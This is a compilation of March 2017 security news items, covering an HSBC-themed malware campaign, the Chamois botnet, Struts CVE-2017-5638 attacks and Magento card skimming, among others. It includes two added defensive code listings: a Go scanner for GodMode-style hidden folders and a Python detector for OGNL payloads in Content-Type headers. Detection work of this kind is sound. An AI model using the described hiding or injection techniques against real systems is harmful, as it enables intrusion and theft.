A total of 11 XSS flaws were addressed this month, along with 7 missing authorization checks, 5 DOS issues, 4 SQL Injection vulnerabilities, 3 Information disclosure bugs, 2 Implementation flaws, 1 RCE, 1 XML external entity, and 1 session fixation.


HSBC Users Targeted With Fake Security Software

14.3.2017 securityweek Crime
A recent spam campaign impersonating UK-based banking giant HSBC is attempting to distribute malware masquerading as legitimate security software, Symantec researchers warn.

The spam emails were designed to look as though they had been sent by HSBC, and even display an "@hsbc.com" sender address. The messages claim to deliver Rapport, the fraud-protection software from Trusteer (acquired by IBM in 2013), a legitimate program designed to protect online banking sessions. What users actually receive, however, is a malicious information-stealing application. What's more, the malware uses the Windows "GodMode" folder trick to keep itself hidden on compromised machines, the researchers say.

The spam messages feature security advisory information and eco-friendly messaging, in an attempt to look more convincing. The email even warns recipients against opening attachments from unknown or non-trustworthy sources, but also includes a series of elements that clearly suggest it isn’t as legitimate as it pretends to be.

For example, the email subject line features the phrase “Payment Advice” followed by a large gap and then 10 random characters, the language and sentence structure in the email are suspicious, with some not making sense at all, and the email has a “virus detection software” as attachment, and not “payment advice,” as claimed. Moreover, the email features a .7z attachment, which legitimate emails wouldn’t (legitimate emails wouldn’t deliver antivirus software either).

The .7z archive contains the fake Rapport executable and an Instruction.jar file. When executed, the malware creates a folder for itself and then hides it by leveraging Windows "GodMode" (also known as the Windows Master Control Panel shortcut: a specially named folder that Explorer presents as a view of various control settings in some Windows versions rather than as an ordinary folder; various malware families have abused it for persistence).
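An added illustration in Go (not Symantec's code or the malware's) of a hunt for the hiding technique just described. Background assumed here and not taken from the article: Windows Explorer treats any folder named "<name>.{CLSID}" as the shell object identified by that CLSID, and the GodMode shortcut uses the CLSID {ED7BA470-8E54-465E-825C-99712043E01C}, so a folder named, say, Rapport.{ED7BA470-8E54-465E-825C-99712043E01C} opens as a control-panel listing and never shows the files dropped inside it. The folder names in the usage and test are invented.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Well-known CLSID behind the "GodMode" / Master Control Panel trick. This GUID
// is general Windows knowledge and does not appear in the Symantec write-up.
const masterControlPanelCLSID = "{ED7BA470-8E54-465E-825C-99712043E01C}"

// Explorer hands a folder named "<anything>.{GUID}" to the shell object that
// owns the GUID, so the folder's real contents are never listed in the UI.
var clsidSuffix = regexp.MustCompile(`(?i)\.(\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\})$`)

// CLSIDSuffix returns the upper-cased {GUID} suffix of a folder name, if any.
func CLSIDSuffix(name string) (string, bool) {
	m := clsidSuffix.FindStringSubmatch(name)
	if m == nil {
		return "", false
	}
	return strings.ToUpper(m[1]), true
}

// IsGodModeFolderName is true for the Master Control Panel CLSID specifically.
func IsGodModeFolderName(name string) bool {
	s, ok := CLSIDSuffix(name)
	return ok && s == masterControlPanelCLSID
}

// FindCLSIDFolders walks root and reports every directory carrying a CLSID
// suffix, tagging the Master Control Panel one; when hunting, run it over user
// profiles and %ProgramData%. Only directories count: a plain file with such a
// name is not hidden this way.
func FindCLSIDFolders(root string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		if !d.IsDir() {
			return nil
		}
		if _, ok := CLSIDSuffix(d.Name()); ok {
			tag := "clsid-folder"
			if IsGodModeFolderName(d.Name()) {
				tag = "godmode-folder"
			}
			hits = append(hits, tag+": "+path)
		}
		return nil
	})
	return hits, err
}

func main() {
	root := "."
	if len(os.Args) > 1 {
		root = os.Args[1] // e.g. a mounted user profile
	}
	hits, err := FindCLSIDFolders(root)
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Println(h)
	}
}
```

Any CLSID-suffixed directory outside the places Windows itself creates them is worth a look, which is why the generic "clsid-folder" tag is reported too; the GodMode GUID is just the one this campaign picked. The listing works from a command prompt or from a forensic image because the trick lives entirely in how Explorer renders the name, not in the file system.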

After a successful infection, the malware modifies registry entries (to disable notifications) and a series of system tools, in an attempt to shield itself. Next, the Trojan starts the communication with the command and control (C&C) server, allowing the remote attacker to steal information from the compromised machine.

The spam run was active for 24 hours, from February 10 through February 11, but Symantec suggests that it could be part of a larger campaign, given that similar HSBC-themed emails mentioning payment advice have been observed on other occasions, carrying Themida-packed information-stealing malware.

Last year, a spam campaign was observed spreading Panda Banker and abusing HSBC’s name (and the name of other institutions, depending on the targeted users), while a more recent attack was distributing the Adwind RAT via emails supposedly coming from the HSBC Advising Service (from the mail.hsbcnet.hsbc.com domain).


Adobe Patches Vulnerabilities in Flash, Shockwave

14.3.2017 securityweek Vulnerability
Security updates released by Adobe on Tuesday patch seven vulnerabilities in Flash Player and one vulnerability in Shockwave Player.

Flash Player 25.0.0.127 fixes critical security holes that affect version 24.0.0.221 and earlier on Windows, Mac, Linux and Chrome OS. Adobe has found no evidence of exploitation in the wild.

The vulnerabilities include buffer overflow, use-after-free and other memory corruption issues that can lead to arbitrary code execution. The latest version also addresses an information disclosure problem related to a random number generator.

The weaknesses were reported to Adobe by researchers at Qihoo 360, Palo Alto Networks, the Nanyang Technological University in Singapore, and an expert who wanted to remain anonymous.

In the case of Shockwave Player, version 12.2.8.198 for Windows patches an important privilege escalation flaw (CVE-2017-2983) related to the directory search path used to find resources.

The flaw was disclosed responsibly by Nitesh Shilpkar and there is no evidence that it has been exploited for malicious purposes.

Last month, Adobe patched more than a dozen code execution vulnerabilities in Flash Player, and several other bugs in Digital Editions and the Campaigns marketing tool.


Facebook Bans Developers From Using Data for Surveillance

14.3.2017 securityweek Social
Facebook this week announced an update to its platform policies to ban developers from using data obtained from the company to build surveillance tools.

The change was made not only to the Facebook platform policy, but to the Instagram’s as well, and impacts all developers interested in using the Facebook and Instagram APIs to build applications and services.

Starting this week, the first data protection policy listed on Facebook for Developers (the same as the 28th general term on the Instagram platform policy page) also reads “don't use data obtained from us to provide tools that are used for surveillance.” Previously, it only required developers to protect the information received from the company “against unauthorized access, use, or disclosure.”

Earlier this year, software security startup Fallible revealed that many Android applications unnecessarily store keys or secrets (which could leak sensitive data) related to some of the most popular online services, Instagram included (along with Twitter, Flickr, Dropbox, Slack, Uber, and Amazon AWS).

Facebook is determined to both make the policy explicit and enforce it. Over the past several months, the company has been working with the American Civil Liberties Union of California (ACLU), Color of Change, and the Center for Media Justice on this update and on increasing the public awareness on the issue.

“Over the past several months we have taken enforcement action against developers who created and marketed tools meant for surveillance, in violation of our existing policies; we want to be sure everyone understands the underlying policy and how to comply,” Rob Sherman, Deputy Chief Privacy Officer, Facebook, says.

In October last year, Facebook (and Twitter) cut access to certain data for analytics firm Geofeedia after an ACLU report revealed that Geofeedia’s social media monitoring product was being “marketed to law enforcement as a tool to monitor activists and protesters.” The report was referring to the wave of protests in the Missouri community after the police shooting of an unarmed African-American man and also stated that “law enforcement has used Geofeedia to monitor protests.”

“Over the years, we have learned the importance of updating these policies to offer more clarity or incorporate constructive feedback. These changes help us improve our community and discourage unwanted behavior,” Sherman also notes.

Recently, Facebook updated its Advertising Policies to ban ads that promote payday loans, after an update last year more explicitly prohibited various kinds of discriminatory advertising. Future policy updates are to be expected as well, as the company works to “support our community,” Sherman concludes.


Home Depot to Pay Banks $25 Million for 2014 Breach

14.3.2017 securityweek Crime
Home Depot has agreed to pay $25 million to the financial institutions affected by the massive data breach suffered by the retailer in 2014, when cybercriminals managed to steal email addresses and payment card data belonging to more than 50 million customers.

The retail giant will create a $25 million settlement fund that will be distributed among affected financial institutions.

Organizations that submit claims can receive $2 for each of the payment cards for which they received alerts as a result of the breach, without providing any documentation. Companies that do provide documentation can recover up to 60 percent of losses.

In addition, Home Depot is prepared to pay a total of up to $2,250,000 to sponsored entities whose legal claims against the company were released by their sponsor.

As part of the settlement, Home Depot has also agreed to improve its data security practices in an effort to avoid similar incidents in the future, court documents show.

Fortune reported that the retailer has already paid out more than $134 million to Visa, MasterCard and other financial organizations.

As for the lawsuit filed by affected consumers, Home Depot last year agreed to pay at least $19.5 million to settle charges, including for reimbursements and identity protection services. The total cost of the breach is at least $179 million.

Home Depot’s investigation revealed that cybercriminals had access to the company’s systems between April and September 2014. The attackers used custom-built malware to steal payment cards and other customer data without being detected.


Google Blocks Sophisticated Android Botnet

14.3.2017 securityweek BotNet
Google recently discovered and blocked a sophisticated fraud botnet that was being distributed through multiple channels and which employed several methods to avoid detection.

Dubbed Chamois, the botnet was one of the largest Potentially Harmful Application (PHA) families seen on Android to date, and could remain persistent on infected devices by not showing in the application list at all. The malicious program was also capable of generating revenue by engaging in numerous activities, Google says.


The malicious apps based on Chamois that Google analyzed could generate invalid traffic through ad pop-ups by displaying deceptive graphics inside the ads; could perform artificial app promotion by automatically installing apps in the background; could perform telephony fraud by sending premium text messages; and could also download and execute additional plugins on the compromised devices.

The malicious apps didn’t appear in the device's app list, which prevented users from removing them. Furthermore, the deceptive graphics used to trick users into clicking ads could sometimes result in additional malicious applications being downloaded onto the device, such as SMS fraud programs.

In addition to staying well hidden on Android devices, Chamois had other features that made it unusual as well, such as a multi-staged payload, with its code being executed in 4 distinct stages using different file formats.

“This multi-stage process makes it more complicated to immediately identify apps in this family as a PHA because the layers have to be peeled first to reach the malicious part. However, Google's pipelines weren't tricked as they are designed to tackle these scenarios properly,” Security Software Engineers Bernhard Grill, Megan Ruthven, and Xin Zhao explain.

The PHA attempted to evade detection with the help of obfuscation and anti-analysis techniques, while also using a custom, encrypted file storage for its configuration files, along with additional code that required deeper analysis. Chamois also featured a great deal of (over 100,000 lines of) “sophisticated code written by seemingly professional developers,” Google’s engineers say.

To block the threat, Google used Verify Apps, in addition to kicking out “bad actors who were trying to game our ad systems.” With the help of Verify Apps, users are automatically warned when downloading apps that are considered PHAs, and they can also find and remove such threats if they have been already installed, even if they don’t appear in the application list, as was the case with Chamois.

According to Google, Verify Apps was also meant to monitor the state of the Android ecosystem for anomalies, as well as to investigate the ones that it finds, and leverages behavior analysis on devices to discover PHAs. Many of the applications that Chamois downloaded were highly ranked by the Dead or Insecure (DOI) scorer (apps that have a high chance of being downloaded by devices that are no longer checking up with Verify Apps are considered DOI apps).


UK NCSC warns of cyber attacks powered by Russia against the political system
14.3.2017 securityaffairs BigBrothers

The UK National Cyber Security Center (NCSC) is warning of Russian political hacking capabilities, the risk of cyber attacks against the political system is high.
The alert was raised by the UK National Cyber Security Center (NCSC), which is informing political parties in the UK about “the potential for hostile action against the UK political system.”

The warning doesn’t confirm that Russia is the most dangerous state for political hacking, but the intelligence community has no doubts about the cyber capabilities of Russian state-sponsored hackers.

In a separate context, the British Foreign Secretary Boris Johnson explained that there is no evidence of cyber attacks powered by Russian entities against British politicians and parties.

“We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that.” Johnson declared on national television Sunday. He also referred to the cyber attacks against the French TV network TV4Monde and the diversionary strategy adopted by Russian hackers.

“There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention.”

Last year, the US government accused Russia of cyberattacks against American political organizations; the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published a Joint Analysis Report (JAR) that includes information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence Services (RIS) against the United States election.

The U.S. Government linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE. It was the first time that a JAR attributed malicious cyber activity to specific countries or threat actors.

The fear of possible attacks powered by Russian hackers is shared among multiple European Governments.

In January, French Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warned of hacking campaigns targeting the upcoming elections.

The Minister warned of possible cyber attacks like the ones that targeted the 2016 US Presidential Election.

In France, the conservative candidate Francois Fillon has been praised by Russian president Vladimir Putin due to his intention to intensify the relationship with the Kremlin. On the other side, the candidate Marine Le Pen is in total opposition to Russia; for this reason, experts believe that hackers could target her and her party.

Relations between Russia and France are not good due to the position of President Hollande on the dispute between Russia and Ukraine in the 2014 Crimean Crisis.

President Hollande also blamed Russia for war crimes over its bombardment of the Syrian city of Aleppo.

The Minister is overseeing an overhaul of the cyber-security operations conducted by his Government.

In November 2016, the German government expressed concerns about possible interference of Russian nation-state hackers with the 2017 German election.


German politicians fear the Kremlin’s cyber capabilities. The alleged Russian interference in the US Presidential election is unleashing a domino effect and instilling fear in governments.

“I don’t have any concrete information about the origin of the attacks on the Telekom network,” Chancellor Angela Merkel said on Tuesday in Berlin. “Let me just say that such cyberattacks, or ‘hybrid attacks’ as they’re known in Russian doctrine, are part of everyday life today, and we need to learn to deal with them.”

Germany’s Interior Minister Thomas de Maizière expressed great caution about explicitly blaming Moscow.

“It’s possible that we can’t clearly distinguish between criminal activities launched from a certain country and state activities,” Maizière declared at a conference of federal state interior ministers in Saarbrücken, when asked if Moscow was responsible for the attacks against the German routers.

The new president of the German intelligence service (BND), Bruno Kahl, confirmed that foreign hackers may try to launch cyber attacks in an attempt to “delegitimize the democratic process” in the country.

“In an interview with the Süddeutsche Zeitung newspaper, Bruno Kahl – the new president of German intelligence service, the BND – complained about hackers trying to “delegitimize the democratic process as such” and said he had “indications” that the hacks “came from certain quarters,” namely Russia. And the Telekom hack is by no means the only attack of its kind in Germany.” reported DW.com.

Returning to the warning issued by GCHQ: in a letter sent to the British political parties, NCSC chief executive Ciaran Martin urged them to stay alert to cyber attacks against their infrastructure that attempt to subvert democratic processes in the country.

“You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties’ own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals’ email accounts.” Martin wrote in the letter.

“Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management.”


Google Kicks Out Largest Android Adware Family From The Play Store
14.3.2017 thehackernews Android
With the rise in the mobile market, Adware has become one of the most prevalent mobile threats in the world. Adware has traditionally been used to aggressively push ads like banners or pop-ups on mobile screens to make money.
The troublesome part is that Adware is now becoming trojanized and more sophisticated, as it aggressively collects personal data from the mobile device it's installed on, including name, birth date, location, serial number, contacts, and browser data without users' consent.
However, the risk is a bit higher on Android than other platforms because of the extra permissions that apps enjoy.
Although Google has stepped up its efforts to remove potentially harmful apps from its Play Store in past years and added more stringent malware checks for new apps, adware apps eventually find their way into its mobile app marketplace to target millions of Android users.
In its recent efforts to make its Play Store ecosystem safe, Google discovered a massive new ad-fraud botnet family that was infecting Android users through apps hosted on its official Play Store.
Dubbed Chamois, the family of PHAs (potentially harmful applications) was capable of bombarding users with pop-up ads, boosting app promotion by automatically installing other applications in the background, subscribing users to premium services by sending text messages and downloading additional plugins without their knowledge.
Google engineers said they caught Chamois after they discovered suspicious ad traffic while performing a routine ad traffic quality evaluation.
Despite the fact that the app uses obfuscation and anti-analysis techniques to evade detection, Google engineers eventually uncovered a massive network of developers that had tricked users into installing malicious apps on their phones.
The goal behind the malware-laced apps appears to have been ad fraud: making money while employing different techniques to bypass Google's detection and prevention systems.
"We analyzed malicious apps based on Chamois, and found that they employed several methods to avoid detection and tried to trick users into clicking ads by displaying deceptive graphics," security software engineers at Google said in a blog post.
"This sometimes resulted in downloading of other apps that commit SMS fraud. So we blocked the Chamois app family using Verify Apps and also kicked out bad actors who were trying to game our ad systems."
The Chamois apps had a multi-stage payload structure, including a custom encrypted storage area for configuration files and additional code, which required deeper analysis to understand the malicious part.

According to the Google engineers, their security teams had to look through more than 100,000 lines of sophisticated code written by seemingly professional developers in an effort to figure out exactly what the Chamois-related apps were up to.
After the discovery of Chamois, Google blocked the Chamois app family using its Verify Apps and also banned some people who were trying to take advantage of its ad system to make money on the adware apps.
Google also updated its app testing system that is now capable of detecting this new Chamois-related threat.


VMware Preparing Patches for "Catastrophic" Struts Flaw

14.3.2017 securityweek Vulnerebility
VMware informed customers on Monday that the recently disclosed Apache Struts2 vulnerability, which has been exploited in the wild over the past week, affects several of its products.

The remote code execution vulnerability, tracked as CVE-2017-5638, has been described by VMware as “catastrophic.” The issue impacts versions 6.x and 7.x of the VMware Horizon Desktop-as-a-Service (DaaS) platform, vCenter Server 6.0 and 6.5, vRealize Operations Manager (vROps) 6.x, and vRealize Hyperic Server 5.x.

vCenter 5.5 is not affected. Until fixes become available for vCenter 6.0 and 6.5, users can disable the performance charts service to prevent potential attacks. However, VMware noted that applying the workaround will cause Overview Performance Charts to become unavailable in vSphere Web Client.

Cisco has also launched an investigation to determine which of its products are affected. The networking giant initially identified three products, but the number has now reached 10 and there are still several devices and services under investigation.

Attacks in the wild

This Apache Struts2 vulnerability exists in the Jakarta Multipart parser and is caused by the improper handling of Content-Type header values. A remote, unauthenticated attacker can exploit the flaw to execute arbitrary commands by sending a specially crafted HTTP request.

The security hole was patched on March 6 with the release of versions 2.3.32 and 2.5.10.1, and the first attacks were observed one day later, after a proof-of-concept (PoC) exploit was made public.

Imperva reported seeing thousands of attack attempts in the days following March 7. The attacks were traced to more than 1,300 IP addresses across 40 countries, including China and the United States, which accounted for 67 percent and 17 percent of the attempts, respectively.

Apache Struts attacks

According to data from Imperva, 90 percent of attackers focused their efforts on less than 10 applications, while the rest targeted as many as 181 apps.

A majority of the attacks observed by the security firm were attempts to determine whether the targeted web application was vulnerable, but researchers also noticed attempts to create files.

In some cases, the hackers had tried to download and execute files from a remote server. A control panel found on one of these servers showed that some of the files had been downloaded hundreds of times.

The Canada Revenue Agency (CRA) shut down its website for roughly 48 hours last week after learning of the Struts vulnerability. The organization said its site had been taken offline as a precaution, not as a result of a successful breach.

Hackers did manage to breach Statistics Canada's website by exploiting the flaw, but officials said no sensitive data was compromised, CBC reported.
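A defender-side check for the Content-Type abuse described in this article, added here as an example rather than code from VMware, Imperva or Apache: it scans request records for the OGNL expression markers that a legitimate Content-Type value never contains, flags values that do not even have a media-type shape, and tallies hits per source address the way Imperva's statistics above do. The JSON log shape and the sample records are assumptions constructed for the example.

```python
"""Spot CVE-2017-5638 probes in web logs: Content-Type headers carrying OGNL
expression markers, which the Struts2 Jakarta Multipart parser mishandled.

Added example for this article, not code from VMware, Imperva or Apache. The log
format (one JSON object per request with a "headers" map) is an assumption, and
the sample records below are constructed, not captured traffic.
"""
import json
import re
from collections import Counter

# OGNL expressions open with "%{" or "${"; a legitimate media type never contains them.
OGNL_MARKER = re.compile(r"[%$]\{")
# Rough RFC 2045 shape: type/subtype followed by optional "; name=value" parameters.
VALID_CONTENT_TYPE = re.compile(
    r"^[\w!#$&^.+-]+/[\w!#$&^.+-]+"
    r"(\s*;\s*[\w-]+=(\"[^\"]*\"|[^;\s]*))*\s*$"
)


def classify_content_type(value):
    """Return why a Content-Type value looks like a Struts2 probe, or None if clean."""
    if value is None:
        return None
    if OGNL_MARKER.search(value):
        return "ognl-marker"
    if not VALID_CONTENT_TYPE.match(value):
        return "malformed-content-type"
    return None


def scan_log(lines):
    """Parse JSON request records; return (findings, hit count per source address)."""
    findings, by_source = [], Counter()
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue  # unparseable line: skip it rather than abort the whole scan
        # Header names are case-insensitive, so normalise before the lookup.
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        reason = classify_content_type(headers.get("content-type"))
        if reason:
            findings.append({"src": rec.get("src"), "path": rec.get("path"), "reason": reason})
            by_source[rec.get("src")] += 1
    return findings, by_source


# Constructed sample records (RFC 5737 documentation addresses, placeholder payload).
SAMPLE_LOG = [
    json.dumps({"src": "192.0.2.10", "path": "/orders",
                "headers": {"Content-Type": "application/json"}}),
    json.dumps({"src": "192.0.2.11", "path": "/upload",
                "headers": {"Content-Type": "multipart/form-data; boundary=----constructed"}}),
    json.dumps({"src": "198.51.100.7", "path": "/index.action",
                "headers": {"Content-Type": "%{#constructed_ognl_placeholder}"}}),
    json.dumps({"src": "198.51.100.7", "path": "/login.action",
                "headers": {"content-type": "multipart/form-data; boundary"}}),
    json.dumps({"src": "192.0.2.12", "path": "/static/app.js", "headers": {}}),
    "not json at all",
]

if __name__ == "__main__":
    hits, per_source = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("hits per source:", dict(per_source))
```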


Financial Attackers as Sophisticated as Nation-State Groups: FireEye

14.3.2017 securityweek CyberCrime
Financially motivated attackers have become just as sophisticated as threat actors sponsored by nation states, according to the 2017 M-Trends report published on Tuesday by FireEye-owned Mandiant.

The report, which is based on data from actual incidents investigated by the company, shows that profit-driven cybercriminals have become increasingly sophisticated over the past few years.

Until 2013, cybercriminals mostly launched what experts described as “smash and grab” attacks – little effort was put into hiding their actions and maintaining access to the breached system. In the following years, the line between the level of sophistication exhibited by financial attackers and nation-state actors became increasingly blurry, and now researchers say that line no longer exists.

Financially motivated hackers went from using web shells and Perl2Exe compiled binaries with a limited command and control (C&C) infrastructure to using custom backdoors tailored to the targeted system and leveraging legitimate websites for C&C communications.

Sophistication of financial attacks

One interesting trend observed by Mandiant in 2016 was related to malicious macro-enabled documents. While in many cases attackers attempt to convince targeted users to enable macros by providing instructions in an email or the document itself, in some of the campaigns observed by researchers last year, hackers called victims on the phone to convince them to enable macros.

Retailers can be highly lucrative targets, especially since many of them fail to ensure that their networks are segmented, allowing attackers to breach the entire PCI environment once they have gained access to PoS systems in one location.

Since these attacks can be lucrative, cybercriminals put a lot of effort into them. In one of the attacks investigated by FireEye, a group that targeted more than 100 companies exploited a Windows zero-day vulnerability to escalate privileges on compromised systems.

Cybercriminals also leveraged sophisticated techniques to evade detection and ensure persistence. One of the most interesting methods involved modifying the volume boot record (VBR) to load backdoors before the operating system booted.

FireEye has also analyzed attacks targeting banks. In one incident at a bank in Asia, investigators discovered 96 compromised servers and workstations. The attackers breached a subsidiary’s network and from there they moved to the bank’s infrastructure.

In an attack aimed at a bank in the EMEA region, threat actors hacked into 45 servers and workstations using PowerShell and Metasploit for lateral movement. The attacker used hijacked accounts to initiate transfers of millions of dollars, and then wiped event logs and reformatted system volumes to cause disruptions in an effort to prevent the bank from identifying the fraudulent transactions before the process was completed.

According to FireEye, organizations have been more efficient in identifying breaches themselves, with the global median time from compromise to discovery dropping from 146 days in 2015 to 80 days in 2016. In the Americas, this dwell time was 35 days, but it was much higher in APAC countries, likely due to “lack of investment in security.”

“With an increased willingness of both nation-state and financial threat actors to operate increasingly blatant business disruption, extortion, and public disclosure attacks, fundamental protections such as data and key application segregation, network segmentation, and continuous visibility and monitoring of critical systems have returned to prominence and should remain a primary focus for many IT and security teams,” experts said in the report.

The full M-Trends 2017 report is available online in PDF format.


Enterprises Infected By Pre-installed Android Malware

14.3.2017 securityweek Android
Android devices containing pre-installed malware were recently discovered on 38 mobile devices belonging to two large companies, according to security firm Check Point.

A new report from Check Point reveals a variety of malware, mostly comprised of info-stealers and sketchy ad networks, though a mobile ransomware family was also discovered among them. What’s also interesting is that the malware was present on the infected devices before the users received them, although it wasn’t part of the official ROM the vendors supplied.

The security company says that the malicious applications were “added somewhere along the supply chain.” Six of the malware instances, Check Point discovered, were added by a malicious actor using system privileges, meaning that the users had no means to remove the malware unless they re-flashed the ROM.

One of the malicious APKs, com.google.googlesearch, was an adnet present on 6 devices. Another one was the Slocker mobile ransomware, which uses AES encryption to encrypt all files on the device. The malware uses Tor for its command and control (C&C) communications.

The most notable of the threats, however, was the Loki info-stealer and rogue adnet, found on devices as the com.androidhelper.sdk APK. The malware, Check Point says, uses several different components, each with its own functionality and role. Loki’s malicious goal, in addition to displaying illegitimate advertisements to generate revenue, is to steal data about the device, while installing itself to the system partition to achieve persistence and take full control of the device.

The infected devices include: Galaxy Note 2, Galaxy Note 3, Galaxy Note 4, Galaxy Note 5, Galaxy Note Edge, Galaxy Note 8.0, Galaxy S7, Galaxy S4, Galaxy A5, Galaxy Tab S2, Galaxy Tab 2, LG G4, ZTE x500, vivo X6 plus, Asus Zenfone 2, Oppo N3, Oppo R7 plus, Xiaomi Mi 4i, Xiaomi Redmi, Lenovo S90, Lenovo A850, Nexus 5, and Nexus 5X.

What the security researchers didn’t reveal was whether the infection was part of a targeted attack against the two affected companies, a large telecommunications company and a multinational technology company.

“Pre-installed malware compromises the security even of the most careful users. In addition, a user who receives a device already containing malware will not be able to notice any change in the device’s activity, which often occurs once malware is installed,” Oren Koriat, Check Point Mobile Research Team, says.

Pre-installed malware on mobile devices isn’t new, though it was clear who was to blame for it in previous incidents. In November last year, researchers discovered that the Firmware Over The Air (FOTA) update software system managed by China-based ADUPS performed backdoor activities by collecting information about the devices it was present on. The company said the backdoor was used to improve user experience.

Also in November 2016, the OTA update mechanism provided by another Chinese company, Ragentek Group, was revealed to expose nearly 3 million devices to Man-in-the-Middle (MitM) attacks and to allow adversaries to execute arbitrary commands with root privileges.


Cybercriminals Hijack Magento Extension to Steal Card Data

14.3.2017 securityweek Incindent
Cybercriminals have been abusing a payment module to steal credit card data from online shops powered by the Magento ecommerce platform, web security firm Sucuri reported on Friday.

The targeted module is the Realex Payments Magento extension (SF9), which integrates with the Realex Realauth Remote payment gateway. The Realex Payments extension allows Magento store owners to process mail and telephone orders by entering the payment details themselves.

The extension itself is not vulnerable, but attackers can abuse it after they compromise the targeted Magento shop. In the attacks observed by Sucuri, hackers added a malicious function called sendCcNumber() to an SF9 file named Remote.php.

The function collects personal and financial data entered by users on the compromised website and sends it back to an email address controlled by the attacker.

The malicious function also leverages the online service binlist.net, which allows users to identify the issuer of a card based on the first six digits of the card number.

Sucuri said it had tracked “massive attacks” where hackers had injected malicious scripts into Magento websites in an effort to steal card data.

“Magento credit card stealers are indeed on the rise. While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce,” said Bruno Zanelato, malware analyst and team lead at Sucuri. “As the industry grows, so will the specific attacks targeting it. That’s why it is so important to keep your Magento website up to date and apply all the latest security patches!”

These types of attacks are not uncommon, and cybercriminals have used various tricks to evade detection and ensure that their malware is persistent.

In a campaign documented a few months ago, attackers hid stolen card data in harmless-looking image files related to products sold on the compromised website. More recently, researchers identified a piece of malware that restored itself on Magento websites after it had been removed.


Researchers Infiltrate C&C Server Behind CryptoBlock Ransomware

14.3.2017 securityweek Virus
A command and control (C&C) server used for operating the CryptoBlock ransomware family has also been hosting stolen user credentials and other malware families, researchers say.

According to researchers from Malwarebytes Labs, who managed to gain access to the malicious server, the ransomware appears to still be under development at the moment, but is believed to have the potential of becoming a major threat. The malicious operation could even evolve into a RaaS (Ransomware as a Service), the researchers believe.

A note on the domain fliecrypter.in informs wannabe-criminals that the RaaS will be live soon, but it appears that some users have already been infected with this malware (although the distribution mechanism isn’t clear as of now). The ransomware, however, is completely obfuscated with ConfuserEX, which is difficult to unravel, researchers say.

The security experts decided to have a look at the ransomware’s server, which they acquired during previous research, and which revealed, among other .php pages, a config.php file that included the actor’s login credentials for the server. Specifically, the file revealed “the complete master credentials (username and password) to the entire CryptoBlock server, valid for every email, database, SSH, cPanel, and more,” Nathan Scott, Malwarebytes Labs Lead Malware Intelligence Analyst, notes.

Courtesy of these, the researchers gained complete access to a threat actor’s overseas server, which allowed them to copy all of the data there, including databases, PHP files, and the personal information used to rent the server. However, because the hosting company only required an email address to host the server, and because the email was fake, the researchers couldn’t learn more on the actor.

Server logs, however, revealed that the ransomware might have already infected quite a few people, and that there were “a few IP addresses from Europe that have been visiting this server by the thousands since it was brought up.” These, the researchers say, might be the real IPs used by the threat actor owning the server while testing the malware (the most accessed part of the server was a PHP page that is used by the debug build of the ransomware server).

The server was also found to host a full database of stolen credentials from “Pay for Porn” sites, and the database of ransomware users (with IDs, BTC addresses, payments, and keys). Moreover, it revealed that the threat actor applied for a Blockchain API account, and was denied, and that other malware was being distributed from it as well.

“The threat actor is also distributing an exploitable Ammyy Admin executable from the server. It seems they either may be scamming people into letting them onto the machine remotely, or they are simply running it silently as a malicious drive-by. The file on the server is called test.exe,” Scott explains.


Crooks hijack Magento Realex Payments extension to steal payment card data
14.3.2017 securityaffairs Crime

Cybercriminals hijack Magento Realex Payments extension to steal payment card data. Experts at Sucuri are observing massive attacks.
Cybercriminals continue to target the Magento platform to steal credit card data. Crooks have been abusing a payment module to steal payment card data from online shops running on the Magento e-commerce platform.

According to experts at security firm Sucuri, the module being targeted is the Realex Payments Magento extension (SF9), which integrates with the Realex Realauth Remote payment gateway.

The extension allows the administrators of Magento installs to process mail and telephone orders by entering the payment details.

The experts highlighted that the Realex Payments extension is not affected by any vulnerability; the attackers abuse it once they have compromised the Magento installation.

The researchers at Sucuri noticed that crooks added a malicious function called sendCcNumber() to an SF9 file named Remote.php.

This function gathers personal and financial data entered by users and sends it back to an email address controlled by the attacker.

“In this particular case, we found a malicious function specifically targeting the Magento payment module SF9 Realex. SF9 integrates with the Realex RealAuth Remote and Redirect systems, very popular solutions in the Magento community.” reads the analysis published by Sucuri.

“The malicious function had been injected after the website was compromised through a different vulnerability, therefore the component itself (SF9 Realex) wasn’t the source of the problem.”

Realex Payments extension

The researchers also noted that the crooks leverage binlist[.]net to look up the Issuer Identification Number (IIN), the first 6 digits of a credit card number.

The experts at Sucuri have observed “massive attacks” where hackers used the injection of malicious scripts into Magento websites in an attempt to steal payment card data.

The researchers warn of a spike in attacks against e-commerce platforms; for this reason, it is essential to keep websites up to date and apply all security updates.

“Magento credit card stealers are indeed on the rise. While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce,” concluded the analysis at Sucuri. “As the industry grows, so will the specific attacks targeting it. That’s why it is so important to keep your Magento website up to date and apply all the latest security patches!”

Recently, security expert Willem de Groot discovered a new SQL malware targeting online shops running on Magento that was able to hide its malicious code in the website’s database.
